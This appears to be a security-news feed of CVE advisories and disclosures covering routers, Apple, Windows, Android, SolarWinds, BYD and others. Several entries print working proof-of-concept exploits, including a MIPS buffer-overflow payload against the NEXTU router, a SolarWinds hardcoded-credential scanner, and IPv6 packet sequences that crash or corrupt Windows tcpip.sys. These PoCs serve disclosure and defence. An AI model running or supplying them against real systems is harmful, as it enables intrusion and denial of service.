Path Traversal Vulnerability in Surveillance Software - Luxembourg and Belgium notified

7 days ago

Numerous law enforcement agencies worldwide have been affected by a zero-day exploit (path traversal) in reconnaissance software. This apparently also includes body cameras used by special forces, surveillance equipment, and police drones.

The „Media Relay Service (MRS)“ (web server) software for reconnaissance devices from the Israeli manufacturer Infodraw is affected by a serious security vulnerability (Path Traversal Vulnerability). Security experts from Mint Secure discovered the vulnerability and initially reported it to the manufacturer and – due to a lack of response – subsequently to operators and CERTs worldwide in order to rule out further risks and responsibly disclose the vulnerability. This blog post describes technical details, cases from various countries, and the approach behind the discovery. Recommendations for affected organizations are also provided.

Apple fixes WebKit zero-day exploited in ‘extremely sophisticated’ attacks

1 month ago

Apple has released emergency security updates to patch a zero-day bug the company describes as exploited in "extremely sophisticated" attacks.

The vulnerability is tracked as CVE-2025-24201 and was found in the WebKit cross-platform web browser engine used by Apple's Safari web browser and many other apps and web browsers on macOS, iOS, Linux, and Windows.

PolarEdge Botnet Exploits Cisco and Other Flaws to Hijack ASUS, QNAP, and Synology Devices

1 month ago

French cybersecurity company Sekoia observed the unknown threat actors deploying a backdoor by leveraging CVE-2023-20118 (CVSS score: 6.5), a critical security flaw impacting Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers that could result in arbitrary command execution on susceptible devices.

CVE-2023-20118 is leading to a webshell installation.

Formal Vulnerability Disclosure for iPhone 15 Pro Max (iOS 18.3.1)

2 months ago

Executive Summary

This report updates the findings on CVE-2025-24085, a use-after-free vulnerability affecting Apple's IDS subsystem and iMessage's BlastDoor sandboxing. Findings (As of February 20, 2025)

iOS 18.3.1 remains vulnerable despite Apple's February 19, 2025, mitigation deadline.
BlastDoor is bypassed, enabling unsandboxed iMessage processing.
Privilege escalation attempts detected, suggesting a possible kernel exploit.
Unauthorized decryption and authentication tampering observed, raising concerns about iMessage interception and data exposure.

The exploit remains active in the wild, requiring immediate action.

https://github.com/orgs/community/discussions/152523

Palantir - Security Bulletin - CVE-2024-49581 - Palantir’s External Artifacts service (versions 105.110.1 through 105.115.0)

2 months ago

Restricted Views backed objects (OSV1) could be bypassed under specific circumstances due to a software bug, this could have allowed users that didn't have permission to see such objects to view them via Object Explorer directly. The affected service have been patched and automatically deployed to all Apollo-managed Foundry instances.

SonicWall Firewall Vulnerability Exploited After PoC Publication

2 months ago

Threat actors started exploiting a recent SonicWall firewall vulnerability this week, shortly after proof-of-concept (PoC) code targeting it was published.

According to Bishop Fox, approximately 4,500 internet-facing SonicWall SSL VPN servers had not been patched against CVE-2024-53704 by February 7.

NEXTU FLETA Wifi6 Router DOS, Potential RCE POC

2 months ago

from pwn import *  
from hackebds import *  


def shutdown_shell_code():  
    context.update(arch='mips', os='linux', bits=32, endian='little')  

    cmd = "/bin/sh"  
    args = ["autoreboot"]  

    asmcode = shellcraft.mips.linux.execve(cmd, args, 0) + shellcraft.mips.linux.exit()  
    shellcode = asm(asmcode)  
    return shellcode  


power_off_code = shutdown_shell_code()  

gap_code = (b'A') * 0x138

# This is the area that overwrites the RET region. You can place the address to which you want to redirect the execution flow.
# For example I fixed address as 0x7f854710
RET_address = (b'\x10\x47\x85\x7f')  
stack_gap = (b'C') * 0x40  

print("power_off_code_length")  
print(len(power_off_code))  

final_code = power_off_code + gap_code + RET_address + stack_gap  

import socket  
import ssl  

# Server Address and Port  
HOST = '192.168.1.254'  
PORT = 443  

# Create an SSL socket for HTTPS connection
context = ssl.create_default_context()  
context.set_ciphers('HIGH:!DH:!aNULL')  
context.check_hostname = False  
context.verify_mode = ssl.CERT_NONE  

with socket.create_connection((HOST, PORT)) as sock:  
    with context.wrap_socket(sock, server_hostname=HOST) as ssock:  
            # Prepare the shellcode as bytes (e.g., b'\x00\x01\x02'; replace with appropriate values for actual use)

        # parameter for evade verification  
        send_byte = b"enabled=ON&automaticUplinkSpeed=ON&automaticDownlinkSpeed=ON&addressType=0&ipversion=0&protocol=0&ipStart=192.168.1.5&ipEnd=192.168.1.5&localPortStart=1234&localPortEnd=1234&rmt_ipStart=&rmt_ipEnd=&rmt_portStart=&rmt_portEnd=&l7_protocol=Disable&mode=1&bandwidth=200&bandwidth_downlink=200&remark_dscp=&save_apply=%EC%A0%80%EC%9E%A5+%ED%9B%84+%EC%A0%81%EC%9A%A9&addQosFlag=1&lan_mask=255.255.255.0&submit-url=%2Fip_qos.htm&entry_name=" + final_code  

        # POST request headers 
        headers = b"POST /boafrm/formIpQoS HTTP/1.1\r\n" \  
                  b"Host: " + HOST.encode('utf-8') + b"\r\n" \  
                                                     b"Content-Type: application/octet-stream\r\n" \  
                                                     b"Content-Length: " + str(len(send_byte)).encode(  
            'utf-8') + b"\r\nConnection: close\r\n\r\n"  

        # Send request (combine headers and body)  
        ssock.send(headers + send_byte)  

        # Receive response  
        response = b""  
        while True:  
            data = ssock.recv(1024)  
            if not data:  
                break  
            response += data  

            #Print response  
        print(response.decode('utf-8'))

A vulnerability report for BYD (Chinese car maker)

3 months ago

Vulnerability Report - BYD QIN PLUS DM-i - Dilink OS - Incorrect Access Control

Product: BYD QIN PLUS DM-i - Dilink OS

Vendor: https://www.byd.com/

Version: 3.0_13.1.7.2204050.1.

Vulnerability Type: Incorrect Access Control

Attack Vectors: The user installs and runs an app on the IVI system that only requires normal permissions.

Introduction

​ The BYD QIN PLUS DM-i with Dilink OS contains an Incorrect Access Control vulnerability. Attackers can bypass permission restrictions and obtain confidential vehicle data through Attack Path 1: System Log Theft and Attack Path 2: CAN Traffic Hijacking.

Attack Path 1 : System Log Theft

​ Incorrect access control in BYD QIN PLUS DM-i Dilink OS 3.0_13.1.7.2204050.1 allows unaithorized attackers to access system logcat logs.

Description

​ The DiLink 3.0 system’s /system/bin/app_process64 process logs system logcat data, storing it in zip files in the /sdcard/logs folder. These logs are accessible by regular apps, allowing them to bypass restrictions, escalate privileges, and potentially copy and upload sensitive vehicle data (e.g., location, fuel/energy consumption, VIN, mileage) to an attacker’s server. This poses a serious security risk, as the data is highly confidential for both users and manufacturers.

Detailed Steps

1. Check the system-collected and stored system logs.

2. The malicious app copies system files to its own private directory. The main code is as follows:

3. The malicious app successfully steals system logs to its private directory.

   

4. Extract the file and search for sensitive confidential information in the system logs.

​ (a) Fuel consumption, energy consumption, and seatbelt status.

​ (b) ICCID, VIN (Vehicle Identification Number), and model code.

​ (c) Diagnostic command format.

​ (d) Various detailed vehicle status information.

Ethical Considerations

​ The vulnerability has been reported to the manufacturer and confirmed. It has been addressed and fixed in in the latest versions, with the logs now encrypted.

Additional Notes

​ Our vulnerability discovery was conducted on a standalone in-vehicle system, and due to the absence of a real vehicle, the logs collected by the system were quite limited. In a real vehicle, we expect to collect a much richer and larger volume of logs. Due to device limitations, we were unable to conduct further verification. Additionally, only one version of the in-vehicle system was tested, but other versions may also contain the same vulnerability, with the actual impact potentially being more severe.

Disclaimer

​ This vulnerability report is intended solely for informational purposes and must not be used for malicious activities. The author disclaims any responsibility for the misuse of the information provided.

Attack Path 2 : CAN Traffic Hijacking

​ The attacker can remotely intercept the vehicle's CAN traffic, which is supposed to be sent to the manufacturer's cloud server, and potentially use this data to infer the vehicle's status.

Description

​ In the DiLink 3.0 system, the /system/priv-app/CanDataCollect folder is accessible to regular users, allowing them to extract CanDataCollect.apk and analyze its code. The "com.byd.datacollectionnotify" broadcast, not protected by the system, lets apps set the CAN traffic upload URL. This enables attackers to:

1. Set the upload URL to null, preventing cloud data collection.
2. Set the upload URL to an attacker’s domain for remote CAN traffic collection.

​ Additionally, the encoded upload files can be decrypted using reverse-engineered decoding functions, enabling attackers to remotely analyze CAN traffic and infer the vehicle's status.

Detailed Steps

1. The vulnerability code for the broadcast handling in CanDataCollect.apk.

2. The exploitation code for the malicious app vulnerability.

3. The malicious app successfully modifies the uploaded CAN traffic URL.

4. After the attack on the IVI system, the logcat logs route CAN traffic to the attacker’s server.

5. The CAN traffic collected by the attacker and the decoded results.

Ethical Considerations

​ The vulnerability has been reported to the manufacturer and confirmed. It has been addressed and fixed in the latest versions.

Additional Notes:

​ Our vulnerability discovery was conducted on a standalone in-vehicle system, and due to the absence of a real vehicle, the logs collected by the system were quite limited. In a real vehicle, we expect to collect a much richer and larger volume of logs. Due to device limitations, we were unable to conduct further verification. Additionally, only one version of the in-vehicle system was tested, but other versions may also contain the same vulnerability, with the actual impact potentially being more severe.

Disclaimer

​ This vulnerability report is intended solely for informational purposes and must not be used for malicious activities. The author disclaims any responsibility for the misuse of the information provided.

Yealink informs that the SIP-T46S has been discontinued since 2022-03-31

3 months ago

""" Dear Customers,

Yealink hereby informs you that the SIP-T46S has been discontinued since 2022-03-31. After the date, new orders for the product would not be accepted.

After the End-of-Life date, Yealink will not pursue any new feature development on SIP-T46S, but we will follow the industry standard practices regarding software support of the discontinued (EOL) products. Consistent with such standards, Yealink will continue to offer support and after-sale service.

The general policy guidelines are:

(1) For the first year from the End of Life date, Yealink will offer full support, including HW/SW Technical Support, Apply Existing SW Bug Fixes, New Non-Critical SW Bug Fixes, New Critical SW Bug Fixes and New Security Fixes.

(2) For the second year till, and including, the fifth year from the End of Life, Yealink will attempt to provide SW bug fixes. In the EOL support phase, a SW upgrade of the product to a newer existing release will also be seen as a fix to the SW bug. Providing a fix may not be possible in some cases due to the limitation of hardware or software architecture, and Yealink in its sole discretion will determine what fixes, if any, will be provided.

(3) Yealink will not offer any New Features/Enhancements support from the End of Life.

(4) Spares or replacement parts for hardware will be available depending on your local distributors. Please contact your local Yealink distributors for HW Technical Support and HW Repair and Return (subject to inventory availability). The local Yealink distributors will provide you the corresponding HW support in accordance with Yealink Return Materials Authorization (RMA) process.

(5) Since the sixth year from the End of Life, Yealink will not offer any Support. """

Proof Of Concept

3 months ago

// ravi (@0xjprx)
// 2-byte kernel infoleak, introduced in xnu-11215.1.10.
// gcc SUSCTL.c -o susctl
// ./susctl
#include <stdio.h>
#include <sys/sysctl.h>

void leak() {
    uint64_t val = 0;
    size_t len = sizeof(val);
    sysctlbyname("net.inet.udp.log.remote_port_excluded", &val, &len, NULL, 0);
    printf("leaked: 0x%llX 0x%llX\n", (val >> 16) & 0x0FF, (val >> 24) & 0x0FF);
}

int main() {
    leak();
    return 0;
}

from https://github.com/jprx/CVE-2024-54507

A particularly 'sus' sysctl in the XNU Kernel

3 months ago

Timeline

• September 16, 2024: macOS 15.0 Sequoia was released with xnu-11215.1.10, the first public kernel release with this bug.
• Fall 2024: I reported this bug to Apple.
• December 11, 2024: macOS 15.2 and iOS 18.2 were released, fixing this bug, and assigning CVE-2024-54507 to this issue.

Fortigate Belsen Leak - parser from @cudeso@infosec.exchange

3 months ago

A quick parser to extract whois and country data from the darkweb forum post listing Fortinet devices victim to CVE-2022-40684.

Parser available at:

https://github.com/cudeso/tools/tree/master/CVE-2022-40684

MediaTek/Android 2025-01 Security bulletins - Users are strongly encouraged to check for updates

3 months ago

MediaTek has notified device manufacturers (OEMs) about these vulnerabilities and provided corresponding security patches.

Users are strongly encouraged to check for updates from their device manufacturers and apply them as soon as possible to mitigate these security risks.

See bundle: https://vulnerability.circl.lu/bundle/a30ff14f-a073-49be-8c0c-6b6afd6a19f3

Various Android devides are impacted.

Some questions about CVE-2017-7407 and Bagder's work quality (@bagder@mastodon.social) 🙃

4 months ago

It seems that Bagder loves when someone dives deep into history and believes they have found a mistake in his work.

Serbia: Authorities using spyware and Cellebrite forensic extraction tools to hack journalists and activists

4 months ago

"Serbian police and intelligence authorities are using advanced phone spyware alongside mobile phone forensic products to unlawfully target journalists, environmental activists and other individuals in a covert surveillance campaign, a new Amnesty International report has revealed. "

More information here: https://securitylab.amnesty.org/latest/2024/12/serbia-a-digital-prison-spyware-and-cellebrite-used-on-journalists-and-activists/

netrc and redirect credential leak

4 months ago

When asked to both use a .netrc file for credentials and to follow HTTP redirects, curl could leak the password used for the first host to the followed-to host under certain circumstances.

This flaw only manifests itself if the netrc file has an entry that matches the redirect target hostname but the entry either omits just the password or omits both login and password.

Info

"A curl transfer with a.tld that redirects to b.tld that uses a .netrc like below (with a match, but no password specified for the second host), would make curl pass on alicespassword as password even in the second transfer to the separate host b.tld.

machine a.tld login alice password alicespassword default login bob

This bug is not considered a C mistake. It is not likely to have been avoided had we not been using C.

This flaw also affects the curl command line tool.

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2024-11053 to this issue.

CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

Severity: Low"

Google Warns of Actively Exploited CVE-2024-43093 Vulnerability in Android System

5 months ago

« Nov 05, 2024 Ravie LakshmananMobile Security / Vulnerability Vulnerability in Android System

Google has warned that a security flaw impacting its Android operating system has come under active exploitation in the wild.

The vulnerability, tracked as CVE-2024-43093, has been described as a privilege escalation flaw in the Android Framework component that could result in unauthorized access to "Android/data," "Android/obb," and "Android/sandbox" directories, and their respective sub-directories, according to a code commit message.»

Android Security Bulletin November 2024

Patches released previously did not completely mitigate the vulnerability

6 months ago

VMware has determined that the vCenter patches released previously did not completely mitigate the vulnerability.

https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968

Availability of a patch

6 months ago

The company released a patch in Web Help Desk version 12.8.3 HF2, which addresses this vulnerability. Users are strongly advised to update their software to this version or later to protect against this flaw.

Proof-of-Concept

6 months ago

A PoC is available here: https://github.com/fa-rrel/CVE-2024-28987-POC

import argparse
import base64
import requests

# Created by Ghost sec.
RED = "\033[91m"
GREEN = "\033[92m"
BOLD = "\033[1m"
RESET = "\033[0m"

ascii_art = f"""
{BOLD}{RED}
  ______   __                              __                                         
 /      \ /  |                            /  |                                        
/$$$$$$  |$$ |____    ______    _______  _$$ |_           _______   ______    _______ 
$$ | _$$/ $$      \  /      \  /       |/ $$   |         /       | /      \  /       |
$$ |/    |$$$$$$$  |/$$$$$$  |/$$$$$$$/ $$$$$$/         /$$$$$$$/ /$$$$$$  |/$$$$$$$/ 
$$ |$$$$ |$$ |  $$ |$$ |  $$ |$$      \   $$ | __       $$      \ $$    $$ |$$ |      
$$ \__$$ |$$ |  $$ |$$ \__$$ | $$$$$$  |  $$ |/  |       $$$$$$  |$$$$$$$$/ $$ \_____ 
$$    $$/ $$ |  $$ |$$    $$/ /     $$/   $$  $$/       /     $$/ $$       |$$       |
 $$$$$$/  $$/   $$/  $$$$$$/  $$$$$$$/     $$$$/        $$$$$$$/   $$$$$$$/  $$$$$$$/ 
 PROOF OF CONCEPT CVE-2024-28987 || SCANNING VULNERABILITY POC || github.com/fa-rrel
{RESET}
"""

print(ascii_art)

def get_basic_auth_header(username, password):
    credentials = f"{username}:{password}"
    base64_credentials = base64.b64encode(credentials.encode()).decode('utf-8')
    return {'Authorization': f'Basic {base64_credentials}'}

def scan_target(hostname):
    # Ensure hostname does not have trailing slashes
    hostname = hostname.strip().rstrip('/')
    url = f"http://{hostname}/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/"

    # Print formatted URL for debugging
    print(f"{BOLD}[*] Scanning URL: {url}{RESET}")

    headers = get_basic_auth_header("helpdeskIntegrationUser", "dev-C4F8025E7")
    headers['Content-Type'] = 'application/x-www-form-urlencoded'

    try:
        response = requests.get(url, headers=headers, timeout=10)
        if response.status_code == 200 and 'displayClient' in response.text and 'shortDetail' in response.text:
            print(f"{BOLD}{GREEN}[+] Vulnerability confirmed on {hostname} with username: 'helpdeskIntegrationUser' and password: 'dev-C4F8025E7'{RESET}")
        else:
            print(f"{BOLD}{RED}[-] No vulnerability detected on {hostname}{RESET}")
    except requests.RequestException:
        # Modify this line to just print "Not vulnerable" instead of the error details
        print(f"{BOLD}{RED}[-] Not vulnerable on {hostname}{RESET}")

def scan_targets_from_file(file_path):
    try:
        with open(file_path, 'r') as file:
            targets = file.readlines()
            if not targets:
                print(f"{BOLD}{RED}[!] No targets found in file{RESET}")
                return
            for target in targets:
                target = target.strip()
                if target:
                    scan_target(target)
    except FileNotFoundError:
        print(f"{BOLD}{RED}[!] File {file_path} not found{RESET}")
    except Exception as e:
        print(f"{BOLD}{RED}[!] An error occurred: {e}{RESET}")

def main():
    parser = argparse.ArgumentParser(description="CVE-2024-28987 Scanner - SolarWinds Web Help Desk Hardcoded Credential")
    parser.add_argument('-f', '--file', type=str, required=True, help='File containing list of targets')

    args = parser.parse_args()

    scan_targets_from_file(args.file)

if __name__ == "__main__":
    main()

Proof of Concept for CVE-2024-38063 - Remote Code Execution Vulnerability in tcpip.sys

7 months ago

Proof of Concept for CVE-2024-38063, a RCE in tcpip.sys patched on August 13th 2024.

An analysis of the vulnerability published on August 27, 2024 by Marcus Hutchins.

PoC published on GitHub on August 24, 2024.

Implementation

Implementation details are available on GitHub.

from scapy.all import *

iface=''
ip_addr=''
mac_addr=''
num_tries=20
num_batches=20

def get_packets_with_mac(i):
    frag_id = 0xdebac1e + i
    first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
    second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'
    third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)
    return [first, second, third]

def get_packets(i):
    if mac_addr != '':
        return get_packets_with_mac(i)
    frag_id = 0xdebac1e + i
    first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
    second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'
    third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)
    return [first, second, third]

final_ps = []
for _ in range(num_batches):
    for i in range(num_tries):
        final_ps += get_packets(i) + get_packets(i)

print("Sending packets")
if mac_addr != '':
    sendp(final_ps, iface)
else:
    send(final_ps, iface)

for i in range(60):
    print(f"Memory corruption will be triggered in {60-i} seconds", end='\r')
    time.sleep(1)
print("")

Analysis of a Windows IPv6 Fragmentation Vulnerability: CVE-2021-24086

7 months ago

Analysis of a denial of service vulnerability affecting the IPv6 stack of Windows.

This issue, whose root cause can be found in the mishandling of IPv6 fragments, was patched by Microsoft in their February 2021 security bulletin.

Proof of Concept

```python import sys import random

from scapy.all import *

FRAGMENTSIZE = 0x400 LAYER4FRAG_OFFSET = 0x8

NEXTHEADERIPV6ROUTE = 43 NEXTHEADERIPV6FRAG = 44 NEXTHEADERIPV6_ICMP = 58

def get_layer4(): er = ICMPv6EchoRequest(data = "PoC for CVE-2021-24086") er.cksum = 0xa472

return raw(er)

def getinnerpacket(targetaddr): innerfragid = random.randint(0, 0xffffffff) print("**** innerfragid: 0x{:x}".format(innerfragid)) rawer = get_layer4()

# 0x1ffa Routing headers == 0xffd0 bytes
routes = raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_ROUTE)) * (0xffd0//8 - 1)
routes += raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_FRAG))

# First inner fragment header: offset=0, more=1
FH = IPv6ExtHdrFragment(offset = 0, m=1, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)

return routes + raw(FH) + raw_er[:LAYER4_FRAG_OFFSET], inner_frag_id

def sendlastinnerfragment(targetaddr, innerfragid):

raw_er = get_layer4()

ip = IPv6(dst = target_addr)
# Second (and last) inner fragment header: offset=1, more=0
FH = IPv6ExtHdrFragment(offset = LAYER4_FRAG_OFFSET // 8, m=0, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)
send(ip/FH/raw_er[LAYER4_FRAG_OFFSET:])

def trigger(target_addr):

inner_packet, inner_frag_id = get_inner_packet(target_addr)

ip = IPv6(dst = target_addr)
hopbyhop = IPv6ExtHdrHopByHop(nh = NEXT_HEADER_IPV6_FRAG)

outer_frag_id = random.randint(0, 0xffffffff)

fragmentable_part = []
for i in range(len(inner_packet) // FRAGMENT_SIZE):
    fragmentable_part.append(inner_packet[i * FRAGMENT_SIZE: (i+1) * FRAGMENT_SIZE])

if len(inner_packet) % FRAGMENT_SIZE:
    fragmentable_part.append(inner_packet[(len(fragmentable_part)) * FRAGMENT_SIZE:])


print("Preparing frags...")
frag_offset = 0
frags_to_send = []
is_first = True
for i in range(len(fragmentable_part)):
    if i == len(fragmentable_part) - 1:
        more = 0
    else:
        more = 1

    FH = IPv6ExtHdrFragment(offset = frag_offset // 8, m=more, id=outer_frag_id, nh = NEXT_HEADER_IPV6_ROUTE)

    blob = raw(FH/fragmentable_part[i])
    frag_offset += FRAGMENT_SIZE

    frags_to_send.append(ip/hopbyhop/blob)


print("Sending {} frags...".format(len(frags_to_send)))
for frag in frags_to_send:
    send(frag)


print("Now sending the last inner fragment to trigger the bug...")
send_last_inner_fragment(target_addr, inner_frag_id)

if name == 'main': if len(sys.argv) < 2: print('Usage: cve-2021-24086.py ') sys.exit(1) trigger(sys.argv[1]) ```

Critical authentication bypass vulnerabilities (CVE-2025-25291 + CVE-2025-25292) were discovered in ruby-saml up to version 1.17.0

1 month ago

Critical authentication bypass vulnerabilities (CVE-2025-25291 + CVE-2025-25292) were discovered in ruby-saml up to version 1.17.0. More information: https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials/

Related vulnerabilities

Cyber Threat Overview 2024 from CERT-FR

1 month ago

In this fourth edition of the Cyber Threat Overview, The French Cybersecurity Agency (ANSSI) addresses prevalent cybersecurity threats and the pivotal incidents which occurred in 2024. In line with the previous years, ANSSI estimates that attackers associated with the cybercriminal ecosystem and reputedly linked to China and Russia are three of the main threats facing both critical information systems and the national ecosystem as a whole.

This past year was also marked by the hosting of the Paris Olympic and Paralympic Games and by the number and the impact of vulnerabilities affecting information systems’ security edge devices.

Related vulnerabilities

Black Basta’s Leaked Chat Logs

1 month ago

Leaked ransomware chat logs reveal Black Basta’s targeted CVEs.

On February 11, 2025, a major leak exposed BLACKBASTA's internal Matrix chat logs. The leaker claimed they released the data because the group was targeting Russian banks. This leak closely resembles the previous Conti leaks.

Cybercrime group focused on Microsoft vulnerabilities as well as flaws in network edge devices and communications software.

We have sightings from MISP and The Shadowserver fundation related to the rejected CVE:

• CVE-2024-21683
• ghsa-vr88-2hv2-5jvf

Related vulnerabilities

Potential privilege escalation in IDPKI (CVE-2024-39327, CVE-2024-39328, CVE-2024-51505)

2 months ago

A security assessment of IDPKI implementation revealed a weakness potentially allowing an operator to exceed its privileges.

In the course of a pentest security assessment of IDPKI, some security measures protecting internal communications were found potentially compromised for an internal user with high privileges.

None of these vulnerabilities put Certificate Authority (CA) private key at risk.

Eviden analyzed the root cause of the weakness. It revealed two separate vulnerabilities. During validation of the fix, an additional vulnerability of similar nature was identified, leveraging some race condition to alter an internal automata state and achieve a system privilege escalation:

• CVE-2024-39327: The vulnerability could allow the possibility to obtain CA signing in an illegitimate way.

• CVE-2024-39328: Highly trusted role (Config Admin) could exceed their configuration privileges in a multi-partition environment and access some confidential data. Data integrity and availability is not at risk.

• CVE-2024-51505: Highly trusted role (Config Admin) could leverage a race condition to escalate privileges.

• CVE-2024-39327 correction has been validated and published.

• CVE-2024-39328 correction has been validated and published. This vulnerability has no impact in mono-partition nor in SaaS environments.

• CVE-2024-51505 risk is increased if the last fixes are not applied, as a lower privileged role is required. A fix is available and published.

Related vulnerabilities

A Mirai botnet is attempting exploitation in the wild using a new (at least to us) set of CVEs

2 months ago

A Mirai botnet is attempting exploitation in the wild using a new set of CVEs, focusing mostly on IoT devices. Includes:

• Tenda CVE-2024-41473
• Draytek CVE-2024-12987
• HuangDou UTCMS V9 CVE-2024-9916
• Totolink CVE-2024-2353 CVE-2024-24328 CVE-2024-24329
• (likely) Four-Faith CVE-2024-9644

Source: The Shadowserver Foundation

Related vulnerabilities

disabling cert checks: "we have not learned much" from @bagder@mastodon.social

2 months ago

The article "Disabling cert checks: we have not learned much" by Daniel Stenberg, published on February 11, 2025, discusses the persistent issue of developers disabling SSL/TLS certificate verification in applications, despite the security risks involved. Stenberg reflects on the history of SSL/TLS usage, emphasizing that since 2002, curl has verified server certificates by default to prevent man-in-the-middle attacks. He highlights common challenges that lead developers to disable certificate verification, such as development environment mismatches, outdated CA stores, or expired certificates. Despite efforts to educate and design APIs that encourage secure practices, the problem persists, indicating a need for continued emphasis on the importance of proper certificate verification in software development.

A quick CVE search immediately reveals security vulnerabilities for exactly this problem published only last year:

• CVE-2024-32928 – The libcurl CURLOPTSSLVERIFYPEER option was disabled on a subset of requests made by Nest production devices.
• CVE-2024-56521 – An issue was discovered in TCPDF before 6.8.0. If libcurl is used, CURLOPTSSLVERIFYHOST and CURLOPTSSLVERIFYPEER are set unsafely.
• CVE-2024-5261 – In affected versions of Collabora Online, in LibreOfficeKit, curl’s TLS certificate verification was disabled (CURLOPTSSLVERIFYPEER of false).

Related vulnerabilities

Unauthenticated RCE on Some Netgear WiFi Routers, PSV-2023-0039

2 months ago

NETGEAR has released fixes for an unauthenticated RCE security vulnerability on the following product models:

• XR1000 fixed in firmware version 1.0.0.74
• XR1000v2 fixed in firmware version 1.1.0.22
• XR500 fixed in firmware version 2.3.2.134

NETGEAR strongly recommends that you download the latest firmware as soon as possible.

Related vulnerabilities

Command injection and insecure default credentials vulnerabilities in certain legacy DSL CPE from Zyxel

2 months ago

Summary

Zyxel recently became aware of CVE-2024-40890 and CVE-2024-40891 being mentioned in a post on GreyNoise’s blog. Additionally, VulnCheck informed us that they will publish the technical details regarding CVE-2024-40891 and CVE-2025-0890 on their blog. We have confirmed that the affected models reported by VulnCheck, VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500, are legacy products that have reached end-of-life (EOL) for years. Therefore, we strongly recommend that users replace them with newer-generation products for optimal protection. What are the vulnerabilities?

CVE-2024-40890

UNSUPPORTED WHEN ASSIGNED

A post-authentication command injection vulnerability in the CGI program of certain legacy DSL CPE models, including VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500, could allow an authenticated attacker to execute operating system (OS) commands on an affected device by sending a crafted HTTP POST request. It is important to note that WAN access is disabled by default on these devices, and this attack can only be successful if user-configured passwords have been compromised.

CVE-2024-40891

UNSUPPORTED WHEN ASSIGNED

A post-authentication command injection vulnerability in the management commands of certain legacy DSL CPE models, including VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500. This vulnerability could allow an authenticated attacker to execute OS commands on an affected device via Telnet. It is important to note that WAN access and the Telnet function are disabled by default on these devices, and this attack can only be successful if the user-configured passwords have been compromised.

CVE-2025-0890

UNSUPPORTED WHEN ASSIGNED

Insecure default credentials for the Telnet function in certain legacy DSL CPE models, including VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500, could allow an attacker to log in to the management interface if the administrators have the option to change the default credentials but fail to do so. It is important to note that WAN access and the Telnet function are disabled by default on these devices. What should you do?

The following models—VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500—are legacy products that have reached EOL status for several years. In accordance with industry product life cycle management practices, Zyxel advises customers to replace these legacy products with newer-generation equipment for optimal protection. If you obtained your Zyxel product through an internet service provider (ISP), please contact the ISP for support. For ISPs, please contact your Zyxel sales or service representatives for further details.

Additionally, disabling remote access and periodically changing passwords are proactive measures that can help prevent potential attacks.

Coordinated Timeline:

• 2024-07-13: VulnCheck notified Zyxel about vulnerabilities in the EOL CPE VMG4325-B10A without providing any reports.
• 2024-07-14: Zyxel requested VulnCheck to provide a detailed report; however, VulnCheck did not respond.
• 2024-07-31: VulnCheck published CVE-2024-40890 and CVE-2024-40891 on their blog without informing Zyxel.
• 2025-01-28: GreyNoise published CVE-2024-40890 and CVE-2024-40891 on their blog.
• 2025-01-29: Zyxel received VulnCheck’s report regarding CVE-2024-40890, CVE-2024-40891, and CVE-2025-0890.
• 2025-01-29: Zyxel became aware of the vulnerabilities in certain legacy DSL CPE models.

Related vulnerabilities

CMSimple 5.16 vulnerabilities leading to RCE

3 months ago

Vulnerabilities in CMSimple 5.16 leading to RCE

• CVE-2024-57546 - An issue in CMSimple v.5.16 allows a remote attacker to obtain sensitive information via a crafted script to the validate link function.
• CVE-2024-57547 - Insecure Permissions vulnerability in CMSimple v.5.16 allows a remote attacker to obtain sensitive information via a crafted script to the Functionality of downloading php backup files.
• CVE-2024-57548 - CMSimple 5.16 allows the user to edit log.php file via print page.
• CVE-2024-57549 - CMSimple 5.16 allows the user to read cms source code through manipulation of the file name in the file parameter of a GET request.

Original research

https://github.com/h4ckr4v3n/cmsimple5.16_research

Related vulnerabilities

A triple-exploit chain. auth bypass (1) to exposed dbus interface (2) to command injection (3) (from @da_667@infosec.exchange)

3 months ago

A triple-exploit chain. auth bypass (1) to exposed dbus interface (2) to command injection (3): https://www.exploit-db.com/exploits/45100

Related vulnerabilities

